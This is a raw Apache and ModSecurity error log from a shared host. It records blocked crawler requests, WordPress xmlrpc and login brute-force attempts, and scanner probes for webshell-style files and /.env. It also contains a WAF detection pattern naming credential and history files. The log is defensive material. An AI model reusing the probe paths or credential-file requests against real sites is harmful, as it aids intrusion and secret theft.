[Tue May 26 18:38:37.979492 2026] [core:error] [pid 1015481:tid 1015709] [client 35.94.96.83:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 18:38:37.979514 2026] [core:error] [pid 1015481:tid 1015709] [client 35.94.96.83:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 18:38:38.183858 2026] [security2:error] [pid 1015481:tid 1015546] [remote 142.44.233.211:58820] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "deeigo.com"] [uri "/robots.txt"] [unique_id "ahWbVrQIKfWDMlp2INdLMwABg0A"]
[Tue May 26 18:38:38.184053 2026] [security2:error] [pid 1015481:tid 1015732] [client 142.44.233.211:58820] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "deeigo.com"] [uri "/robots.txt"] [unique_id "ahWbVrQIKfWDMlp2INdLMwABg0A"]
[Tue May 26 18:38:38.750711 2026] [security2:error] [pid 1015481:tid 1015625] [client 57.141.2.33:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWbVrQIKfWDMlp2INdLNgAAARg"]
[Tue May 26 18:38:39.081654 2026] [core:error] [pid 1015481:tid 1015628] (104)Connection reset by peer: [client 20.206.67.134:2180] AH00574: ap_content_length_filter: apr_bucket_read() failed, referer: www.google.com
[Tue May 26 18:38:39.353813 2026] [security2:error] [pid 1015481:tid 1015510] [remote 185.71.88.234:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 234.88.71.185.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWbV7QIKfWDMlp2INdLUgABRxw"]
[Tue May 26 18:38:39.353988 2026] [security2:error] [pid 1015481:tid 1015672] [client 185.71.88.234:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWbV7QIKfWDMlp2INdLUgABRxw"]
[Tue May 26 18:38:39.631071 2026] [security2:error] [pid 1015481:tid 1015591] [remote 15.235.98.153:30276] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "deeigo.com"] [uri "/"] [unique_id "ahWbV7QIKfWDMlp2INdLXgABgm0"]
[Tue May 26 18:38:39.631233 2026] [security2:error] [pid 1015481:tid 1015731] [client 15.235.98.153:30276] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "deeigo.com"] [uri "/"] [unique_id "ahWbV7QIKfWDMlp2INdLXgABgm0"]
[Tue May 26 18:38:39.760082 2026] [security2:error] [pid 1015481:tid 1015597] [remote 5.78.119.122:39394] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 122.119.78.5.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "hassina-foundation.com"] [uri "/wp-login.php"] [unique_id "ahWbV7QIKfWDMlp2INdLXQABaXM"]
[Tue May 26 18:38:41.317405 2026] [security2:error] [pid 1015481:tid 1015682] [client 57.141.2.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWbWLQIKfWDMlp2INdLfQAAAVE"]
[Tue May 26 18:38:43.269467 2026] [security2:error] [pid 1015481:tid 1015627] [client 57.141.2.32:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWbWrQIKfWDMlp2INdLrAAAARo"]
[Tue May 26 18:38:46.302320 2026] [security2:error] [pid 1015481:tid 1015713] [client 124.43.5.103:23641] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 103.5.43.124.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "cicodev.org"] [uri "/xmlrpc.php"] [unique_id "ahWbXrQIKfWDMlp2INdL7wAAAXA"]
[Tue May 26 18:38:46.302428 2026] [security2:error] [pid 1015481:tid 1015713] [client 124.43.5.103:23641] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "cicodev.org"] [uri "/xmlrpc.php"] [unique_id "ahWbXrQIKfWDMlp2INdL7wAAAXA"]
[Tue May 26 18:38:46.393100 2026] [security2:error] [pid 1015481:tid 1015651] [client 57.141.2.46:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWbXbQIKfWDMlp2INdL7gAAATI"]
[Tue May 26 18:38:48.679028 2026] [security2:error] [pid 1015481:tid 1015611] [client 57.141.2.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWbYLQIKfWDMlp2INdMHAAAAQo"]
[Tue May 26 18:38:49.594767 2026] [security2:error] [pid 1015481:tid 1015604] [remote 91.227.122.219:35676] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 219.122.227.91.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWbYbQIKfWDMlp2INdMMAABcHo"]
[Tue May 26 18:38:49.987423 2026] [security2:error] [pid 1015481:tid 1015533] [remote 185.71.88.234:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 234.88.71.185.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWbYbQIKfWDMlp2INdMNwABfTM"]
[Tue May 26 18:38:49.987574 2026] [security2:error] [pid 1015481:tid 1015726] [client 185.71.88.234:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWbYbQIKfWDMlp2INdMNwABfTM"]
[Tue May 26 18:38:50.106022 2026] [security2:error] [pid 1015481:tid 1015629] [client 176.65.139.233:42034] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pkinsurance.co.in.svijaykumar.in"] [uri "/.env"] [unique_id "ahWbYrQIKfWDMlp2INdMPgAAARw"]
[Tue May 26 18:38:50.502137 2026] [security2:error] [pid 1015481:tid 1015658] [client 14.189.137.191:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWbYrQIKfWDMlp2INdMPQAAATk"]
[Tue May 26 18:38:52.040282 2026] [security2:error] [pid 1015481:tid 1015630] [client 57.141.2.18:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWbY7QIKfWDMlp2INdMUwAAAR0"]
[Tue May 26 18:38:52.104401 2026] [security2:error] [pid 1015481:tid 1015656] [client 43.173.182.230:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWbY7QIKfWDMlp2INdMWwAAATc"]
[Tue May 26 18:38:53.707785 2026] [security2:error] [pid 1015481:tid 1015654] [client 165.140.119.146:58975] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 146.119.140.165.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bloggertarget.com"] [uri "/wp-comments-post.php"] [unique_id "ahWbZbQIKfWDMlp2INdMfgAAATU"], referer: https://www.bloggertarget.com
[Tue May 26 18:38:53.707952 2026] [security2:error] [pid 1015481:tid 1015654] [client 165.140.119.146:58975] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "409"] [hostname "www.bloggertarget.com"] [uri "/wp-comments-post.php"] [unique_id "ahWbZbQIKfWDMlp2INdMfgAAATU"], referer: https://www.bloggertarget.com
[Tue May 26 18:38:54.550579 2026] [security2:error] [pid 1015481:tid 1015625] [client 57.141.2.65:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWbZrQIKfWDMlp2INdMhwAAARg"]
[Tue May 26 18:38:56.067117 2026] [security2:error] [pid 1015481:tid 1015519] [remote 178.156.182.155:55604] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 155.182.156.178.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWbZ7QIKfWDMlp2INdMpwABVCU"]
[Tue May 26 18:38:57.244762 2026] [security2:error] [pid 1015481:tid 1015640] [client 124.43.5.103:23885] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 103.5.43.124.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "cicodev.org"] [uri "/xmlrpc.php"] [unique_id "ahWbabQIKfWDMlp2INdMwwAAASc"]
[Tue May 26 18:38:57.244942 2026] [security2:error] [pid 1015481:tid 1015640] [client 124.43.5.103:23885] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "cicodev.org"] [uri "/xmlrpc.php"] [unique_id "ahWbabQIKfWDMlp2INdMwwAAASc"]
[Tue May 26 18:38:57.318441 2026] [security2:error] [pid 1015481:tid 1015682] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWbaLQIKfWDMlp2INdMvwAAAVE"]
[Tue May 26 18:38:58.032909 2026] [security2:error] [pid 1015481:tid 1015736] [client 20.196.127.68:5898] ModSecurity: Warning. Pattern match "/1\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1543"] [id "900921"] [msg "temporary TUW-72162 logging rule"] [hostname "aeromodellingconsultants.com"] [uri "/1.php"] [unique_id "ahWbarQIKfWDMlp2INdM0AAAAYc"]
[Tue May 26 18:38:58.090671 2026] [security2:error] [pid 1015481:tid 1015736] [client 20.196.127.68:5898] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "aeromodellingconsultants.com"] [uri "/1.php"] [unique_id "ahWbarQIKfWDMlp2INdM0AAAAYc"]
[Tue May 26 18:38:58.527436 2026] [security2:error] [pid 1015481:tid 1015679] [client 192.178.4.103:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "www.srsglobalsoft.com"] [uri "/index.php"] [unique_id "ahWbarQIKfWDMlp2INdM1wAAAU4"]
[Tue May 26 18:38:58.681880 2026] [security2:error] [pid 1015481:tid 1015721] [client 20.196.127.68:1809] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "aeromodellingconsultants.com"] [uri "/2.php"] [unique_id "ahWbarQIKfWDMlp2INdM3QAAAXg"]
[Tue May 26 18:38:59.263991 2026] [security2:error] [pid 1015481:tid 1015648] [client 51.195.183.87:37362] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "www.bramas.in"] [uri "/robots.txt"] [unique_id "ahWba7QIKfWDMlp2INdM5QAAAS8"]
[Tue May 26 18:38:59.264108 2026] [security2:error] [pid 1015481:tid 1015648] [client 51.195.183.87:37362] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "www.bramas.in"] [uri "/robots.txt"] [unique_id "ahWba7QIKfWDMlp2INdM5QAAAS8"]
[Tue May 26 18:38:59.293289 2026] [security2:error] [pid 1015481:tid 1015702] [client 20.196.127.68:3601] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "aeromodellingconsultants.com"] [uri "/7.php"] [unique_id "ahWba7QIKfWDMlp2INdM5gAAAWU"]
[Tue May 26 18:38:59.902184 2026] [security2:error] [pid 1015481:tid 1015624] [client 20.196.127.68:10574] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "aeromodellingconsultants.com"] [uri "/10.php"] [unique_id "ahWba7QIKfWDMlp2INdM9wAAARc"]
[Tue May 26 18:39:00.154672 2026] [security2:error] [pid 1015481:tid 1015692] [client 57.141.2.35:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWba7QIKfWDMlp2INdM9QAAAVs"]
[Tue May 26 18:39:00.508084 2026] [security2:error] [pid 1015481:tid 1015639] [client 20.196.127.68:3090] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "aeromodellingconsultants.com"] [uri "/13.php"] [unique_id "ahWbbLQIKfWDMlp2INdM_gAAASY"]
[Tue May 26 18:39:00.608684 2026] [security2:error] [pid 1015481:tid 1015622] [client 148.113.130.98:63308] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "www.bramas.in"] [uri "/"] [unique_id "ahWbbLQIKfWDMlp2INdNAAAAARU"]
[Tue May 26 18:39:00.608822 2026] [security2:error] [pid 1015481:tid 1015622] [client 148.113.130.98:63308] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "www.bramas.in"] [uri "/"] [unique_id "ahWbbLQIKfWDMlp2INdNAAAAARU"]
[Tue May 26 18:39:00.662525 2026] [security2:error] [pid 1015481:tid 1015534] [remote 185.71.88.234:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 234.88.71.185.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWbbLQIKfWDMlp2INdNBAABMTQ"]
[Tue May 26 18:39:00.662709 2026] [security2:error] [pid 1015481:tid 1015650] [client 185.71.88.234:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWbbLQIKfWDMlp2INdNBAABMTQ"]
[Tue May 26 18:39:01.115981 2026] [security2:error] [pid 1015481:tid 1015688] [client 20.196.127.68:2256] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "aeromodellingconsultants.com"] [uri "/100.php"] [unique_id "ahWbbbQIKfWDMlp2INdNEAAAAVc"]
[Tue May 26 18:39:01.781888 2026] [security2:error] [pid 1015481:tid 1015721] [client 20.196.127.68:4940] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "aeromodellingconsultants.com"] [uri "/222.php"] [unique_id "ahWbbbQIKfWDMlp2INdNIwAAAXg"]
[Tue May 26 18:39:02.420380 2026] [security2:error] [pid 1015481:tid 1015710] [client 20.196.127.68:10727] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "aeromodellingconsultants.com"] [uri "/adminfuns.php"] [unique_id "ahWbbrQIKfWDMlp2INdNMQAAAW0"]
[Tue May 26 18:39:02.618891 2026] [security2:error] [pid 1015481:tid 1015655] [client 57.141.2.49:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWbbrQIKfWDMlp2INdNKgAAATY"]
[Tue May 26 18:39:03.033198 2026] [security2:error] [pid 1015481:tid 1015654] [client 20.196.127.68:6729] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "aeromodellingconsultants.com"] [uri "/abcd.php"] [unique_id "ahWbb7QIKfWDMlp2INdNOAAAATU"]
[Tue May 26 18:39:03.644522 2026] [security2:error] [pid 1015481:tid 1015650] [client 20.196.127.68:14881] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "aeromodellingconsultants.com"] [uri "/al.php"] [unique_id "ahWbb7QIKfWDMlp2INdNQgAAATE"]
[Tue May 26 18:39:04.266522 2026] [security2:error] [pid 1015481:tid 1015712] [client 20.196.127.68:10281] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "aeromodellingconsultants.com"] [uri "/alfa.php"] [unique_id "ahWbcLQIKfWDMlp2INdNRwAAAW8"]
[Tue May 26 18:39:04.876348 2026] [security2:error] [pid 1015481:tid 1015623] [client 20.196.127.68:1138] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "aeromodellingconsultants.com"] [uri "/as.php"] [unique_id "ahWbcLQIKfWDMlp2INdNUAAAARY"]
[Tue May 26 18:39:05.057541 2026] [security2:error] [pid 1015481:tid 1015559] [remote 103.11.102.22:45290] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 22.102.11.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWbcLQIKfWDMlp2INdNTwABM00"]
[Tue May 26 18:39:05.161321 2026] [security2:error] [pid 1015481:tid 1015705] [client 57.141.2.2:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWbcLQIKfWDMlp2INdNTgAAAWg"]
[Tue May 26 18:39:05.463701 2026] [security2:error] [pid 1015481:tid 1015730] [client 20.196.127.68:3088] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "aeromodellingconsultants.com"] [uri "/aa.php"] [unique_id "ahWbcbQIKfWDMlp2INdNYAAAAYE"]
[Tue May 26 18:39:06.067341 2026] [security2:error] [pid 1015481:tid 1015726] [client 20.196.127.68:2241] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "aeromodellingconsultants.com"] [uri "/abc.php"] [unique_id "ahWbcrQIKfWDMlp2INdNbAAAAX0"]
[Tue May 26 18:39:06.653935 2026] [security2:error] [pid 1015481:tid 1015718] [client 20.196.127.68:12636] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "aeromodellingconsultants.com"] [uri "/av.php"] [unique_id "ahWbcrQIKfWDMlp2INdNegAAAXU"]
[Tue May 26 18:39:07.265503 2026] [security2:error] [pid 1015481:tid 1015724] [client 20.196.127.68:10249] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "aeromodellingconsultants.com"] [uri "/autoload_classmap.php"] [unique_id "ahWbc7QIKfWDMlp2INdNhQAAAXs"]
[Tue May 26 18:39:07.748857 2026] [security2:error] [pid 1015481:tid 1015634] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWbc7QIKfWDMlp2INdNiAAAASE"]
[Tue May 26 18:39:07.876616 2026] [security2:error] [pid 1015481:tid 1015712] [client 124.43.5.103:24177] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 103.5.43.124.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "cicodev.org"] [uri "/xmlrpc.php"] [unique_id "ahWbc7QIKfWDMlp2INdNlgAAAW8"]
[Tue May 26 18:39:07.877873 2026] [security2:error] [pid 1015481:tid 1015712] [client 124.43.5.103:24177] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "cicodev.org"] [uri "/xmlrpc.php"] [unique_id "ahWbc7QIKfWDMlp2INdNlgAAAW8"]
[Tue May 26 18:39:07.892725 2026] [security2:error] [pid 1015481:tid 1015670] [client 20.196.127.68:10714] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "aeromodellingconsultants.com"] [uri "/asus.php"] [unique_id "ahWbc7QIKfWDMlp2INdNlwAAAUU"]
